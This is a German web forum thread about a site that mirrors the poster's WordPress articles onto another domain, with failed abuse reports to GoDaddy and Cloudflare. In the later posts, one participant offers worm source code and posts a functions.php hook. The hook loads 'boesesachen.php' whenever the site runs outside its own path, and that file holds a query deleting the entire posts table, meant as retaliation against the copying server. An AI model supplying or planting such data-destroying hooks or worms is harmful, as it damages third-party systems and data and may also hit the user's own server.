Geklaute FTP Datenbank

• In diesem Artikel ist die Rede von einer php Datei die man erstellen muss und dann noch etwas mit htaccess... Ich habs jetzt bestimmt 10 mal durchgelesen, aber ich raffe einfach nicht wie die das meinen. Bin ja Naturdoof, vielleicht kann mir da mal einer ne Zeichnung machen ;)

Schritt für Schritt Anleitung unter

So kann man die Domain ins Leere laufen lassen
    http://www.seohelfer.de/marketing/aufg…-china-143.html

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• Hallo.
    Vielen Dank, aber den Link kannte ich schon. Schritt eins dieser Anleitung versteh ich ja noch, aber ab Schritt 2 gehts schon los . Da kommt bei mir nur ein lautet " HÄ?" aus dem Mund

Schritt 1: Erstelle eine leere PHP-Datei mit dem Inhalt <?php phpinfo(); ?> (ohne die Anführungszeichen) und lade diese auf deine Webseite hoch.

Schritt 2: Rufe die neu erstelle Datei über die falsche Domain auf (in meinem Fall ist dies primeradiviones.com)

Wie denn nun? Wie soll ich denn die von mir erstellte php die ich auf meine Seite/server hochgeladen habe, über die Domain Spielsofort.com , öffnen??

• Wenn der Dieb eine 1:1 Kopie Deines Servers verwaltet, dann wird sich auch die info.php bald darauf befinden. Ergo alle Dateien die auf Deinem Server erstellt werden, werden 1:1 auf die geklaute Domain gespiegelt. Ich denke, dass das gemeint ist

• Und wer weiter denkt, schreibt nicht phpinfo() in die Datei, sondern hängt einen aktuellen Wurm rein oder fackelt sonst irgendwas extrem bösartiges ab, wenn das Skript NICHT auf einer definierten Domain läuft. ;)

• Kollegen, erstmal vielen Dank für die Kommentare :)
    Die klauende Seite / Domain - Spielsofort.com , nimmst sich ja bisher unsere Artikel 1 zu 1. Die Bilder sind zwar auch unsere. Der Rest der Seite, Layout etc ist ja nicht unsers.
    Bisher habe ich also folgendes unternommen:
    Ich habe bei Godaddy gepetzt, resultat = 0 , wurde verwiesen an Cloudflare.
    Habe bei Cloudflare gepetzt, resultat= 0, sind nur ein durchgangsnetzwerk. Habe von Cloudflare dann eine Adresse bekommen wo ich die mittlerweile dann dritte Abuse Meldung abgsetzt habe. Resultat, nach 48 Stunden in der Schleife , kam die Mail dann als unzustellbar zurück.

Dies wurde in die Mail von Cloudflare mit angehängt:

Accepted URL(s) on spielsofort.com: http://spielsofort.com Hosting Provider: ----------------- UNIFIEDLAYER-NETWORK-8 Unified Layer BLUEH-2 Abuse Contact: -------------- ABUSE3581-ARIN Abuse Department +1-888-401-4678 abuse@unifiedlayer.com NOC2320-ARIN Network Operations Center

Und eben diese Adresse ist nicht zu erreichen. Mir wurde nun geraten, Anzeige zu erstatten.
    Übrigens, die Person im Impressum ist wie erwartend unerreichbar

• Nimm mal meinen Tipp wahr. ;) Ich kann Dir einen aktuellen Wurm zur Verfügung stellen (Source). Abfrage auf den ABSPATH rein, wenn der nicht Deiner Struktur entspricht, ausführen. Per require_once in die functions hooken und denn sollte das Thema binnen ein paar Tagen erledigt sein.

Alternativ kannst Du auch die entfernte Datenbank auf die Art und Weise flushen.

Hoffe, das regt den Denkprozess weiter an... :)

• In der functions.php (oder in der footer - spielt keine Rolle) eine Abfrage unterbringen:

Code
    if (ABSPATH != '/var/www/vhosts/kunde123456/') {
      require_once('boesesachen.php');
    }

Deinen eigenen ABSPATH kannst Du bspw. in der footer.php mit einem einfachen [FONT=courier new]echo ABSPATH;[/FONT] anzeigen lassen

Zum Testen kannst Du dann in die 'boesesachen.php' erstmal was anderes reinpinnen. Ansonsten würde sowas hier reichen:

Code
    global $wp, $wpdb;

$wpdb->hide_errors();
    $res = $wpdb->get_results( "DELETE * FROM $wpdb->posts WHERE 1" );

;)

PS: Bitte nicht in einer Live-Umgebung machen!

• Ich hatte es so verstanden, als ob der "stehlende" Server gar keine Kopie hat, sondern nur alles vom "Original-Server" so darstellt, als wäre es seins? D.h. die Skripte (der Wurm...) werden auf dem Originalserver, nicht auf dem stehlenden ausgeführt?

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!